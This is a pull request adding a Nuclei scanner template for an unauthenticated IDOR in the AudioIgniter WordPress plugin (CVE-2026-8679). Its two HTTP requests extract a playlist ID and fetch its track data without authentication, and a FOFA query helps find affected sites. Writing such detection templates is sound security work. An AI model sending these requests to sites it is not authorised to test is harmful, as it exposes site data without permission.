### PR TITLE
Add CVE-2026-8679.yaml -  AudioIgniter <= 2.0.2 - Unauthenticated IDOR

### DIFF
--- a/http/cves/2026/CVE-2026-8679.yaml
+++ b/http/cves/2026/CVE-2026-8679.yaml
@@ -1,0 +1,60 @@
+id: CVE-2026-8679
+
+info:
+  name: WordPress AudioIgniter <= 2.0.2 - Unauthenticated IDOR
+  author: 0x_Akoko
+  severity: high
+  description: |
+    The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. The handle_playlist_endpoint() function accepted a user-controlled playlist ID and returned track data without authentication.
+  reference:
+    - https://plugins.trac.wordpress.org/browser/audioigniter/trunk/audioigniter.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-8679
+    - https://wordpress.org/plugins/audioigniter/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-8679
+    cwe-id: CWE-639
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: body="audioigniter_playlist_id"
+  tags: cve,cve2026,wordpress,wp-plugin,audioigniter,idor,exposure,wp
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "audioigniter_playlist_id")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: playlist_id
+        part: body
+        regex:
+          - 'audioigniter_playlist_id=(\d+)'
+        group: 1
+        internal: true
+
+  - raw:
+      - |
+        GET /?audioigniter_playlist_id={{playlist_id}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains_all(body, "\"title\"", "\"audio\"", "\"subtitle\"")'
+        condition: and


### PR DESCRIPTION
Updated the CVE description for clarity.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
